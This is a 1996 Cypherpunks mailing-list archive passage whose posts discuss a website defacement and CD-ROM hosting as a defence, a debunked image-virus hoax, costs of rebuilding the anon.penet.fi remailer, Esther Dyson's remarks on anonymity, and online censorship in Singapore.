<199609011509.KAA26254@manifold.algebra.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sun, 1 Sep 1996, Igor Chudov @ home wrote: > snow wrote: > > > > On Sat, 31 Aug 1996, Joel McNamara wrote: > > > > > Not really crypto, but related to the DOJ hack in a way. > > > > > > Moscow Channel is a pretty slick, Russian news/commentary page. Their Web > > > site was hacked and altered by someone who didn't seem to like Russians all > > > Just a matter of time before some builds a dedicated Satan type tool that > > > scans for HTTP server holes or messed up file permissions to make locating > > > potential victims easy. > > Write your web site to a CD-ROM and hard-code the base directory into the > > webserver. > > A hacker who has root can forcibly unmount the cdrom and mount another > directory on that node. Not a good solution. As soon as the sysadmin finds out, said directory can be unmounted and CD-ROM device can be remounted. Besides, if someone manages to get root access on any machine, the sysadmin of that machine is basically screwed anyway. It's much better than having to back up the web page on a tape and having to restore the data when it is altered. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMinT7yzIPc7jvyFpAQHe7AgAuRNtTXZeLkuXo0CFoJOgrI+EEfHOKUsI 9KoRm+aesqNOvFpxPcHiE2QypMDjgjFqGozsT+Qb48W82Yt0p10PdqGtq1Ais+M0 b8gwLbnUPY8tnRFL49TqZIvAHl2kyo/7pxViTrXfNtBe+rSA+9FZHPBJgtHzWy2X LIOQ9P6NPMmdlKuaeZQ3oF1esbvlHInsYOgGTJN0DZQR8ivFyXZ3MA0XjXvnF2pl 4lUDfgUN+BAQzhW56o0cgBnGYetujNJYVAQkzUwCIs2sfxS1Sex305vqfmFHUVkY HACMhuoVXYZXuF+5NCjfhHsnjEiYgeMczGTZDlwOCbIFTxCc8/t6tQ== =oxki -----END PGP SIGNATURE----- From bdavis at thepoint.net Sun Sep 1 13:25:32 1996 From: bdavis at thepoint.net (Brian Davis) Date: Mon, 2 Sep 1996 04:25:32 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: > Brad Dolan wrote: > Isn't that mostly an American thing? > > bd But we've taught them so much .... bd2 > On Sun, 1 Sep 1996, Brian Davis wrote: > > > On Sat, 31 Aug 1996, Timothy C. May wrote: > > > > > To be blunt, if Singapore wants to stop me from discussing the dictator Yew > > > and his feeble son, they can't. Except by pulling the plugs on forums in > > > which my posts are carried. I consider this a Good Thing (that politicians > > > in Country A generally have no power to tell citizen-units in Country B > > > what they can say and what they can't). > > > > > > Unless they adopt "Assassination Protection [of the "ignorant" masses]!! > > > > And they won't use remailers ... > > > > EBD > > > > > > > > --Tim May > > > > > > > > > -- > > > [This Bible excerpt awaiting review under the U.S. Communications Decency > > > Act of 1996] > > > And then Lot said, "I have some mighty fine young virgin daughters. Why > > > don't you boys just come on in and fuck them right here in my house - I'll > > > just watch!"....Later, up in the mountains, the younger daughter said: > > > "Dad's getting old. I say we should fuck him before he's too old to fuck." > > > So the two daughters got him drunk and screwed him all that night. Sure > > > enough, Dad got them pregnant, and had an incestuous bastard son....Onan > > > really hated the idea of doing his brother's wife and getting her pregnant > > > while his brother got all the credit, so he pulled out before he > > > came....Remember, it's not a good idea to have sex with your sister, your > > > brother, your parents, your pet dog, or the farm animals, unless of course > > > God tells you to. [excerpts from the Old Testament, Modern Vernacular > > > Translation, TCM, 1996] > > > > > > > > > > > > From bdolan at use.usit.net Sun Sep 1 13:33:00 1996 From: bdolan at use.usit.net (Brad Dolan) Date: Mon, 2 Sep 1996 04:33:00 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: Isn't that mostly an American thing? bd On Sun, 1 Sep 1996, Brian Davis wrote: > On Sat, 31 Aug 1996, Timothy C. May wrote: > > > To be blunt, if Singapore wants to stop me from discussing the dictator Yew > > and his feeble son, they can't. Except by pulling the plugs on forums in > > which my posts are carried. I consider this a Good Thing (that politicians > > in Country A generally have no power to tell citizen-units in Country B > > what they can say and what they can't). > > > Unless they adopt "Assassination Protection [of the "ignorant" masses]!! > > And they won't use remailers ... > > EBD > > > > > --Tim May > > > > > > -- > > [This Bible excerpt awaiting review under the U.S. Communications Decency > > Act of 1996] > > And then Lot said, "I have some mighty fine young virgin daughters. Why > > don't you boys just come on in and fuck them right here in my house - I'll > > just watch!"....Later, up in the mountains, the younger daughter said: > > "Dad's getting old. I say we should fuck him before he's too old to fuck." > > So the two daughters got him drunk and screwed him all that night. Sure > > enough, Dad got them pregnant, and had an incestuous bastard son....Onan > > really hated the idea of doing his brother's wife and getting her pregnant > > while his brother got all the credit, so he pulled out before he > > came....Remember, it's not a good idea to have sex with your sister, your > > brother, your parents, your pet dog, or the farm animals, unless of course > > God tells you to. [excerpts from the Old Testament, Modern Vernacular > > Translation, TCM, 1996] > > > > > > > From tcmay at got.net Sun Sep 1 13:34:02 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 2 Sep 1996 04:34:02 +0800 Subject: Conservation Laws, Money, Engines, and Ontology Message-ID: Keywords: agoric systems, computational ecologies, resource auctioning, Mark Miller, K. Eric Drexler, Bernardo Huberman, contracts, distributed trust, metered usage, software objects, software ICs, superdistribution, Brad Cox, emergent order. In physics there are various conservation laws: conservation of energy, mass, charge, and whatnot. You all know about this... Conservation of mass says that mass is neither created nor destroyed. (For smart aleck quibblers, conservation of mass-energy.) How does this relate to our issues? "Abuse of Resources": Mail loops, infinite loops, spamming, overloads of networks, and congestion in general are cases where "unrealistic" models of costs are implemented in software. In the real physical world, infinite loops don't occur (at least not in the sense seen with mail loops, as a relevant example.) Conservation laws are related to the "cost model" of the universe. Real physical objects have costs, or ontological status, or presence.... (Please don't read too much into this point...I mean to be suggestive, not literal.) There are no "memory leaks" in the universe which suddenly fill it up with stuff, no perpetual motion machines, no creation and destruction of objects. Cyberspace Ontologies: There are several things which need to be done to make the cyberspatial world more like the spatial world: * payment for CPU cycles consumed (via contractual, permission-based access: "If you want access to this machine, here are the terms and conditions.") * metering mechanisms, such as e-stamps for e-mail (essentially a special case of the first point, where a machine says "I'll pass on your message if you pay me to.") * digital contracts, agreements on usage and payment (resource auctioning, or the "smart contracts" that Nick Szabo has written about) (you can all think of additional examples....) Cryptographic protocols have their uses here, but there are also some other measures which bear looking into. In the LISP community, for example, work has been done on "engines," which are building blocks that are "fueled up" with "CPU fuel" and allowed to run for some amount of CPU cycles. Thus, one could put an engine into a process and it would run for some number of ticks, then stop. (I'm sure there are Unix-level tools which do similar things, in terms of giving a spawned process so many ticks of the clock. The "engines" concept is somewhat more semantically clean, in that it's pushed down into the "ontology" of the thing being simulated or run, and is not at the "God level" (to use a non-technical term!).) Now, certainly I support the right of any person or machine to run programs freely and without charge, to pass on e-mail free of charge, to run remailers for no charge, to accept spam mail without complaint, and so on. What I'm suggesting is that many of the problems being seen with overuse of resources, spam, congestion, and denial of service are really due to a poor model of resource allocation. Unix and other modern operating systems offer various tools for helping to constrain such problems, but, I submit, better methods are needed. (Especially when multiple machines, networks, and even anonymous sites are part of the overall system....clearly the constraints must be managed locally, and via "contract," as part of a computational ecology, and not as a hierarchical, top down Unix-type operating system.) Economics is about the "allocation of scarce resources." Many of the existing models being used treat various scarce resources as _free_. Then, when the inevitable problems occur, calls for top-down regulation are heard (e.g., the frequent calls for illegalization of "unwanted mail"). In my view, building a consistent, distributed, "conservative" system is what Cypherpunks need to be thinking about. (I used the term "conservative" in the physics sense. A system in which various conservation laws are obeyed.) As I said before, this should not be compelled, but voluntary. However, those who give their resources away for free (choosing not to adopt a conservative ontology, in other words) should be in no position to complain or run to the government for top-down regulation because there freely-given resources are being overused or "abused" (in their thinking). And closely related to this whole issue--and something I've written about extensively--is the issue of "building walls in cyberspace." In the real world, persistent structures are build out of real materials, resulting in castles, forts, skyscrapers, bridges, houses, highways, etc. These objects have persistence, have controllable access (gates, doors, locks,...), and have "structural integrity." Cryptographic and distributed trust protocols are about the only means I can think of for constructing the equivalents in cyberspace. (And to a large extent, this is already happening: the Net and the Web have structure which cannot be demolished casually, or by top-down orders from any single national leader. Millions of machines, linked in various ways and implementing various protocols and "terms of service" with users and other machines....an early version of the "conservative" system I think we'll someday see.) Well, this gives the flavor of my points. I haven't rigorously argued all of the points, but the Cypherpunks forum is for presenting informal arguments. Thoughts? --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From attila at primenet.com Sun Sep 1 13:43:58 1996 From: attila at primenet.com (attila) Date: Mon, 2 Sep 1996 04:43:58 +0800 Subject: WARNING vIRuS! Message-ID: <199609011900.NAA07748@InfoWest.COM> kickboxer is full of shit --or trolling. since when can a jpeg or gif file viewer execute anything --nothing starts automatically, in any operating system. that is expecting a jump call of some sort. we haven't yet fallen into the impending insecure abyss of MS objects. to have a piece of code embedded execute, a "start-up" program would need to be previously passed to the target machine which literally scanned all memory for the startup sequence in the foreign material --and translate it. on unix, the code would need to be sophisticated enough to remove itself from the process table --even in sleep modes. and, in any system, the startup sequence must be readable, and therefore traceable by anti-virus routines. now that kickboxed has baited the hook for trolling, what new wet dream will we have for rebuttals?!? On Sat, 31 Aug 1996, kickboxer wrote: > There is a new and VERY dangerous virus called the HAZ-MAT virus! > it fucks up the sectors on your hd, and really messes up the partition > tables. It does this once a week, picking a random time to do it. 99.9% of > virus scanners and other antivirus programs will not recognize it, for it is > a totally new strain, using a never before seen code.... Be warned! The > HAZ-MAT virus usually resides in JPG, and GIF files... once the files are > viewed, the virus takes effect. > scan all images upon download! > > > -- you can fool all of the people some of the time, you can fool some of the people all the time, but you can not fool all the people all the time. --Lincoln? cc: Paul Penrod From ichudov at algebra.com Sun Sep 1 14:18:17 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Mon, 2 Sep 1996 05:18:17 +0800 Subject: anon.penet.fi: URGENT REQUEST In-Reply-To: Message-ID: <199609011922.OAA31806@manifold.algebra.com> =?ISO-8859-1?Q?J=FCri_Kaljundi?= wrote: > Sun, 1 Sep 1996 paul at fatmans.demon.co.uk wrote: > > > I don`t know what the response to this will be, I need approximately=20 > > 5000 UK pounds to set up such an operation (Yes, a leased line really=20 > > does cost that much in the UK) and then a monthly income of around=20 > > 3000 UK pounds. > > I remember the load on anon.penet.fi was something like 7500 messages > daily. As for connection, you will need 64kbps line or even less in case > you compress the messages. The machine could be either an older Sun Sparc > or a PC running free Unix (Linux/FreeBSD/...) A couple of notes: 7500 messages/day is not the accurate measure of the load of anon.penet.fi. Remember that each messages had to 1) come in 2) be processed 3) be sent out 4) trigger a confirmation sent to the submitter It is not the same as a user simply receiving 7500 messages/day. If we suppose that each message creates 10KB of IP traffic, it gives us 75MB/day. 75mb/day is less than 1KB per second. It can be handled by a simple 28.8KBPS PPP connection which will still half the capacity to grow twice. A second dedicated phone line and a second modem can be added later. I suspect that UUCP as opposed to IP connection will work better, because UUCP gives us a unidirectional flow of data, which is much more efficient than modems switching direction of the transport for almost each IP packet. I suggest the following configuration: a IBM 486 PC with 16MB of RAM and 28.8 modem, running qmail instead of sendmail and Linux, on a dedicated 28.8 PPP line. The cheapest used VGA display from the nearby waste dump will work just fine. Estimated cost: $700-1000 for the system, $50-100/month for the connection, and 3 hours per day to deal with mailbombing from disgruntled usenet kooks like the right reverend colin james iii (puke). - Igor. From crichardson at earthlink.net Sun Sep 1 14:23:55 1996 From: crichardson at earthlink.net (Conner Richardson) Date: Mon, 2 Sep 1996 05:23:55 +0800 Subject: hackers texts Message-ID: I working on a WWW page for people who want to recieve text articles on hacking/phreaking/etc. It's not very extensive now, but were working on it. Point your browswer to: http://home.earthlink.net/~crichardson/omega.html Also on this page are some files, as well as some other misc indexes. All feedback is apprechiated. -flux From farber at central.cis.upenn.edu Sun Sep 1 14:27:23 1996 From: farber at central.cis.upenn.edu (Dave Farber) Date: Mon, 2 Sep 1996 05:27:23 +0800 Subject: Esther Dyson on Remailers Message-ID: <3.0b11.32.19960901153719.006f4b00@linc.cis.upenn.edu> Just for record, Esther's position is NOT necessarily EFFs. At 01:39 PM 9/1/96 -0400, Duncan Frissell wrote: >At 06:52 AM 9/1/96 -0400, Dave Farber wrote: >>EFF does not, to my knowledge, (and I am a Board Member) have an >>organizational view on this issue. There are a lot of different views and >>each member of EFF has their own view that they can and will state as >>private people. The tendency of the Press to label people with organizations >>affiliation ship gives the impression of organizational views. For example I >>certainly don't speak for the University of Pennsylvania when I say thing to >>the newspapers. >> >>Dave >> > > >At CFP in '95 in SF, Esther expressed the view that there was a place on the >Net for an anonymous ghetto (my words not hers) where people could be >anonymous but that most of the net would involve traceability of >transactions so that people could be held accountable and that businesses >and individuals would want to know who they were dealing with for payment >and accountability reasons. > >I am not stating her position well I'm sure but it was clear that she >thought that non-anonymity would be the rule not because it was mandated but >just because Net actors would want it that way. A short quote would not >allow anyone to understand her full position. > >If she believes that anonymity would be rejected voluntarily for practical >reasons then that is just a prediction of a market not a conclusion. Most >on this list would have no objection to making a prediction though we might >disagree with it. > >Just as Esther predicted that the net would end copyright, we might predict >that the net combined with immediate settlement payment systems might reduce >if not eliminate the need for "positive ID." > >DCF > > > From qut at netcom.com Sun Sep 1 14:31:07 1996 From: qut at netcom.com (Dave Harman OBC) Date: Mon, 2 Sep 1996 05:31:07 +0800 Subject: anon.penet.fi: URGENT REQUEST In-Reply-To: <841590548.16439.0@fatmans.demon.co.uk> Message-ID: <199609011943.MAA08988@netcom3.netcom.com> ! I wish to gauge the response on something here: ! ! Following the closure of the anon.penet.fi remailer: ! ! If I can get enough funding to cover all expenses (I am a student and ! cannot unfortunately contribute much myself) I will install lines and ! hardware at my premises and run the equivalent to the anon.penet.fi ! remailer. ! ! I don`t know what the response to this will be, I need approximately ! 5000 UK pounds to set up such an operation (Yes, a leased line really ! does cost that much in the UK) and then a monthly income of around ! 3000 UK pounds. No way, dude. You can run even an unrestricted T1 here for quite a bit less than �3000. All you need though, is a flat rate dedicated 28,800 modem connection, which has a monthly fee of about �50-100, but we're a little spoiled in the Bay Area. Whatever the fees are there, you could put up something pretty cool as a free server, and perhaps also figure out a way to sell the excess bandwidth at a profit. Whatever you do, stick to one of the unices like linux. Our brief experiences with trying to make Windows 3.0 and Win95 useful convinced us that nothing good can come from Micro$oft. We're planning on starting a modem server as soon as we can get our hardware BS problems sorted out. We'll try installing the cypher punk goodies like Mixmaster. We're planning on a 100% open server that can be telnet 'ed into so we can be open to suggestions to improve security and solicit advice. From porsche at themall.net Sun Sep 1 14:43:44 1996 From: porsche at themall.net (Herbert Feran) Date: Mon, 2 Sep 1996 05:43:44 +0800 Subject: FW: get me off of this list!!!!! Message-ID: --- On Sun, 1 Sep 96 12:41:21 PDT Herbert Feran wrote: I need to be taken off of this list but I can't remeber the code to desubscribe. Can anyone tell me what the code is? ------------------------------------- Name: Herbert Feran E-mail: Herbert Feran Date: 9/1/96 Time: 12:41:21 PM This message was sent by Chameleon ------------------------------------- -----------------End of Original Message----------------- ------------------------------------- Name: Herbert Feran E-mail: Herbert Feran Date: 9/1/96 Time: 12:48:19 PM This message was sent by Chameleon ------------------------------------- From qut at netcom.com Sun Sep 1 15:02:23 1996 From: qut at netcom.com (Dave Harman OBC) Date: Mon, 2 Sep 1996 06:02:23 +0800 Subject: Bob Dole is on Drugs In-Reply-To: <199609011633.LAA30982@manifold.algebra.com> Message-ID: <199609012004.NAA11397@netcom3.netcom.com> ! http://allpolitics.com/news/9608/31/radio.addresses/ ! ! ... snip ... ! ! Dole, who returned to Washington for Labor Day ! weekend, also pledged to use the White House as a ! bully pulpit to promote the "moral message" ! against drugs and to criticize what he called the ! entertainment industry's glamorization of drug use. ! ! On Sunday, he is to address the convention of the ! National Guard Association of the United States ! during which he's expected to propose that the ! military be enlisted to assist in a renewed war on ! drugs. So why didn't you support Pat Buchanan for president, the ONLY candidate to support even a partial legalization of marijuana? Speaking of legalizing drugs, wouldn't it be a good tactic to demand the absolute legalization of ALL drugs? The compromise eventually to follow would be a vast improvement over the status quo. I'm voting Libertarian, and thinking of registering as such, even though I can't stand their capitalist economics, they stand by allowing people to organize and speak out against the very ideals that allowed them to do such. Our government is so corrupt, swinging a figurative axe against it could very well lead to improvement. From matthew at itconsult.co.uk Sun Sep 1 15:18:06 1996 From: matthew at itconsult.co.uk (Matthew Richardson) Date: Mon, 2 Sep 1996 06:18:06 +0800 Subject: anon.penet.fi: URGENT REQUEST In-Reply-To: <841590548.16439.0@fatmans.demon.co.uk> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > I don`t know what the response to this will be, I need approximately > 5000 UK pounds to set up such an operation (Yes, a leased line really > does cost that much in the UK) and then a monthly income of around > 3000 UK pounds. I have looked into UK line costs recently and I suspect that the suggested costs do sound perhaps a little high. Although the set up cost is probably OK, I would suggest that the running costs (assuming that these comprise the circuit charge and payment to an ISP) could be less that half that quoted. What you have been quoted may well depend on who you have spoken to. Best wishes, Matthew -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAgUBMinwBAKwLwcHEv69AQHoGgQAllNK8eXKM6SsNmlnGBmriCklhfI9RZzC GlgtWvTvzsN5j/qoBpWwN4K+fn+HfLScPjQ0rIB50sPTG3E53i4GDsUcTHIQEYKP aNaaiS6ZQKtu2VCBzyyrM5UBoAqronLbBjl3U9C0UDQZ0jdaCUpVWM5qSZikGYTO 5GAWvbp5oq0= =6ZDW -----END PGP SIGNATURE----- From jamesd at echeque.com Sun Sep 1 15:23:48 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 2 Sep 1996 06:23:48 +0800 Subject: Sen. Leahy's "impeccable cyberspace credentials" Message-ID: <199609012034.NAA11901@dns1.noc.best.net> At 06:11 PM 8/31/96 EDT, patrick b cummings wrote: > I agree with what you are saying but not all polititions are that bad. > You make it sound as if their are no politisions are for freedom of the > net. So who is the exception? --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From markm at voicenet.com Sun Sep 1 15:26:49 1996 From: markm at voicenet.com (Mark M.) Date: Mon, 2 Sep 1996 06:26:49 +0800 Subject: It is good that anon.penet.fi has been closed! In-Reply-To: <199609011733.MAA31382@manifold.algebra.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sun, 1 Sep 1996, Igor Chudov @ home wrote: > Yes, subject says it all. anon.penet.fi was a whole lot worse than > cypherpunks remailers. It provided clueless users with no real security, > because it stored return addresses and did not use chaining and > encryption. It also provided anonymity to many people who needed it. I think that many people who need anonymity will probably just learn faking mail and news headers. Many people just don't want to deal with cpunk remailers. OTOH, I agree that this might actually force many people with Penet addresses to learn about more secure remailers. In this way, the closing of anon.penet.fi could be looked upon as a Good Thing. However, as long as there is no easy way for Windoze and Mac users to use secure remailers, users will sooner resort to fake-mailing then learning how to use cpunk remailers. People that need a pseudonym address to use on various support groups can get them from other, equally insecure, remailers. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMinwTizIPc7jvyFpAQFpGAf/ZGEXRU7MuROtatlHoAIdaJfIiwig1oDr fwlNjRe7f1ze8dwUuh74nWFt/ofPtjwSUtpCa1xDgTptPPhzr1I6beOdjwONlUzf MVif+wnzyIp27V/DCjebAMxQc2avmYKM6mwcOKfzFwG0cfvf/walJrjmADR9K0oe EXqi7mJzY1rI08Dsw8aHXNj8maDy9pRTSz9O9e0qZTdFlQtFyVNM6PSfAnKR9e1L ebQ5Yx4qNkgkfhDZgacKNv2inkyuD1LsyQneiCIZ0obhhRL7ORU63wGgYlvqc3gx Ux8sK2mMo6kr2dvA07nRyLzl3w9vm6efrFJeZC94fjdBYxluFg6/ag== =+Qm6 -----END PGP SIGNATURE----- From drose at AZStarNet.com Sun Sep 1 15:52:18 1996 From: drose at AZStarNet.com (David M. Rose) Date: Mon, 2 Sep 1996 06:52:18 +0800 Subject: FW: get me off of this list!!!!! Message-ID: <199609012102.OAA01685@web.azstarnet.com> >--- On Sun, 1 Sep 96 12:41:21 PDT Herbert Feran > wrote: >I need to be taken off of this list but I can't remeber the code > >to desubscribe. Can anyone tell me what the code is? >------------------------------------- What's the frequency Herbert? Help, I've fallen and I can't remeber the code. Hint: Try consulting "The Codebreakers." From qut at netcom.com Sun Sep 1 15:52:29 1996 From: qut at netcom.com (Dave Harman OBC) Date: Mon, 2 Sep 1996 06:52:29 +0800 Subject: anon.penet.fi: URGENT REQUEST In-Reply-To: <199609011922.OAA31806@manifold.algebra.com> Message-ID: <199609012058.NAA16695@netcom3.netcom.com> ! =?ISO-8859-1?Q?J=FCri_Kaljundi?= wrote: ! > Sun, 1 Sep 1996 paul at fatmans.demon.co.uk wrote: ! > ! > > I don`t know what the response to this will be, I need approximately ! > > 5000 UK pounds to set up such an operation (Yes, a leased line really ! > > does cost that much in the UK) and then a monthly income of around ! > > 3000 UK pounds. ! > ! > I remember the load on anon.penet.fi was something like 7500 messages ! > daily. As for connection, you will need 64kbps line or even less in case ! > you compress the messages. The machine could be either an older Sun Sparc ! > or a PC running free Unix (Linux/FreeBSD/...) ! ! A couple of notes: 7500 messages/day is not the accurate measure of ! the load of anon.penet.fi. Remember that each messages had to ! ! 1) come in ! 2) be processed ! 3) be sent out ! 4) trigger a confirmation sent to the submitter There's plenty of room for a hacker to improve the Kleinpaste derived server, such as eliminating confirmations unless there's an error. Queing should help a great deal. ! It is not the same as a user simply receiving 7500 messages/day. ! ! If we suppose that each message creates 10KB of IP traffic, it gives us ! 75MB/day. 75mb/day is less than 1KB per second. It can be handled by a ! simple 28.8KBPS PPP connection which will still half the capacity to grow ! twice. A second dedicated phone line and a second modem can be added ! later. ! ! I suspect that UUCP as opposed to IP connection will work better, ! because UUCP gives us a unidirectional flow of data, which is much more ! efficient than modems switching direction of the transport for almost ! each IP packet. The server can que the mail for a hour or so before sending it out all at once. ! I suggest the following configuration: a IBM 486 PC with 16MB of ! RAM and 28.8 modem, running qmail instead of sendmail and Linux, How is qmail better than sendmail? The default BSD sendmail since 8.00+ has automated ident requests built in. It can easily be compiled without that default option, for greater efficiency. ! on a dedicated 28.8 PPP line. The cheapest used VGA display from ! the nearby waste dump will work just fine. Hell, any monitor should work! I'm curious about how to go about acquiring one of those huge 100+ x 100+ charactor terminals that linux supports. Is it practical, cheap and readable? ! Estimated cost: $700-1000 for the system, $50-100/month for the ! connection, and 3 hours per day to deal with mailbombing from ln -s /dev/null /usr/postmaster ln -s /dev/null /usr/abuse That should filter the mail quite nicely! :-> BTW, do y'all have a favourite Bay Area store for used or otherwise affordable unice fond equiption? Such as used Sparcs or Alphas? Legal copies of commercial unice software along with the equipment? Thanks. From ichudov at algebra.com Sun Sep 1 16:38:52 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Mon, 2 Sep 1996 07:38:52 +0800 Subject: Moscowchannel.com hack In-Reply-To: Message-ID: <199609012149.QAA00600@manifold.algebra.com> Mark M. wrote: > > A hacker who has root can forcibly unmount the cdrom and mount another > > directory on that node. Not a good solution. > > As soon as the sysadmin finds out, said directory can be unmounted and CD-ROM > device can be remounted. Besides, if someone manages to get root access on any > machine, the sysadmin of that machine is basically screwed anyway. It's much > better than having to back up the web page on a tape and having to restore the > data when it is altered. It depends on the ratio R = (frequency of legit Web page changes) / (frequency of breakins * cost of a breakin). The lower is R, the more what you say makes sense. I suspect that in the real world R is rather high. - Igor. From qut at netcom.com Sun Sep 1 16:42:13 1996 From: qut at netcom.com (Dave Harman OBC) Date: Mon, 2 Sep 1996 07:42:13 +0800 Subject: It is good that anon.penet.fi has been closed! In-Reply-To: <199609011733.MAA31382@manifold.algebra.com> Message-ID: <199609012143.OAA20934@netcom3.netcom.com> ! Yes, subject says it all. anon.penet.fi was a whole lot worse than ! cypherpunks remailers. It provided clueless users with no real security, ! because it stored return addresses and did not use chaining and ! encryption. ! ! Maybe closing of anon.penet.fi will spur real interest from the unwashed ! alt.sex.* masses to the truly secure remailers. There has to be more crypto anonymizing aliasing remailers and with easier interfaces. Closing the Kleinpaste derived server will help put the pressure of demand to start better remailer systems. There's not enough capacity and reliability with the servers extant. There should be thousands of full featured remailers. We'll help out as soon as we can get the hardware problems we have figured out and provided there's understandably configurable linux networking software out there. Would it be a good idea to have a 100% open server that anyone can telnet in and copy all the e-mail data? If the chaining crypto remailers are reliable, there's no reason why not, except the risk of clock cycle cryptanalysis. There should be an easy way of preventing those attacks, if not, the data can be read accessable only after the {de|en}cryption. This openness should go a long way in protection so far as liability is concerned. In other words, if Big Brother can force his way into your privacy, why not little brother? From edyson at edventure.com Sun Sep 1 17:04:19 1996 From: edyson at edventure.com (Esther Dyson) Date: Mon, 2 Sep 1996 08:04:19 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi Message-ID: <19960901220323595.AAA208@Esther.edventure.com> Before going into the merits of this, let me make two points: One I specifically asked the reporter (Amy Harmon) to quote me as an individual, not as a spokesperson for the EFF. (It was Amy Harmon, and the only address I have for her bounces, but as you can imagine I would like to get in touch with her! Anyone know it?) These are my personal views; EFF has no formal policy on this yet -- precisely because it's a complex issue. Now, speaking personally: I believe there are trade-offs -- which is what I told the LA Times. I assume I was quoted accurately (although the word "enforce" is awkward), but out of context. Anonymity can be dangerous -- as can traceability, especially in/by repressive regimes. Therefore I would favor allowing anonymity -- with some form of traceability only under terms considerably stronger than what are generally required for a wiretap. Anyone who seriously needs anonymity because of a repressive government is likely to use a foreign (outside whatever jurisdiction he fears) server, so that this is not a matter of "local" laws. The tracer would have to pass through what I hope would be tighter hoops than we have now. Please note that this is not the same as the right to *private* conversations and the use of encryption; this is the issue of being accountable for what you publish in public. My assumption is that there will be a wide variety of Net communities with different rules/regulations/attitudes towards anonymity that would apply ex some kind of international sanctions; I think that's appropriate. Yes, I'm aware of the complexities, and of the possibilities for miscarriages of justice. The world isn't yet the way I want it to be. But I wanted to respond reasonably promptly. BTW, I would welcome a chance to read the whole article (or at least a *little* more of the context, under fair use). Speaking for myself, only (and publicly), Esther Dyson At 06:40 AM 9/1/96 -0400, Dave Farber wrote: >>Posted-Date: Sun, 1 Sep 1996 14:59:53 +1000 (EST) >>Date: Sun, 1 Sep 1996 14:59:53 +1000 (EST) >>From: Charles Senescall >>To: cypherpunks at toad.com >>Cc: declan at well.com >>Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi >>Sender: owner-cypherpunks at toad.com >> >>On Sat, 31 Aug 1996, Declan McCullagh wrote: >> >>> The attached article was reposted to fight-censorship with the permission >>> of the Los Angeles Times, which ran it on the front page today. >>[snip] >>> Note Esther Dyson's comments: >>> >>> "The damage that can be done by anonymity is far bigger" than in >>> any other medium, said Esther Dyson, chairwoman of the Electronic >>> Frontier Foundation. "In the end, you need to be able to get at >>> somebody's identity to enforce accountability, and the question is how >>> do you also enforce freedom of speech and freedom from prosecution for >>> unpopular opinions." >> >>Is this _really_ the EFF policy on anonymopus remailers?? >> >>I will check with our local version of the EFF and see what they have to say. >> >>If the EFF is not for anonymity it needs to be publicised. Perhaps the >>EFF has been in bed with the political pigs too long. *OINK* >> >>-- >> .////. .// Charles Senescall apache at quux.apana.org.au >> o:::::::::/// Fuck TEL$TRA >>>::::::::::\\\ Finger me for PGP PUBKEY Brisbane AUSTRALIA >> '\\\\\' \\ >> >> >> >> > > Esther Dyson Always make new mistakes! EDventure Holdings 1 (212) 924-8800 1 (212) 924-0240 fax 104 Fifth Avenue New York, NY 10011 USA www.edventure.com High-Tech Forum in Lisbon, October 27-29, 1996 PC Forum in Tucson, Arizona, March 23-26, 1997 From rishab at dxm.org Sun Sep 1 17:07:20 1996 From: rishab at dxm.org (Rishab Aiyer Ghosh) Date: Mon, 2 Sep 1996 08:07:20 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: <1.5.4.32.19960831063502.0033b25c@giasdl01.vsnl.net.in> Message-ID: <199609012218.PAA13546@nic.cerf.net> Arun Mehta wrote: > and India will be too: the law here holds the ISPs responsible > for ensuring that nothing objectionable and obscene is carried by > them, and what simpler way to comply than to FWIW: "There is no need to licence content providers; Internet service providers are not responsible for illegal content." R K Takkar, Indian Telecom Secretary (at the time of interview); see http://dxm.org/techonomist/news/ndp1.html for more. > Ideally, I should be able to > send via pgp and anonymous remailer a request for a page, which would soon > come beamed down unencrypted via satellite. No more waiting hours > for the latest version of Netscape to download (!) you'll only have to wait hours for your anonymous-remailer-web-to-e-mail gateway, EVERY time you want a page. In one of my Electric Dreams columns, "Censorship is bad for business," (archived here and there on the Web) I wrote that governments will eventually see sense and stop censorship, if they're interested in making their countries rich. Singapore in every other field of work has shown its interest in deregulation; I would expect them to do so on the Net as well, when it becomes clear that there's rather more to it than porn and subversion. In the meanwhile, there's not much point trying to "help" them, apart from providing moral support. Incidentally, do the cypherpunk archives in Singapore, which always come out first in my AltaVista searches, not contain a trace of officially disliked content? In this month's First Monday, due out tomorrow, Andreas Harsono - a banned Indonesian journalist who reports from Jakarta through the Internet for various foreign publications - writes on censorship in S-E Asia, and how some countries, like Indonesia, are _more_ relaxed in their treatment of on-line media than the press. Best, Rishab ps. I don't read the list regularly, so reply by mail if you want a response. First Monday - The Peer-Reviewed Journal on the Internet http://www.firstmonday.dk/ Munksgaard International Publishers, Copenhagen International Editor - Rishab Aiyer Ghosh (rishab at dxm.org) Pager +91 11 9622 162187; Fax +91 11 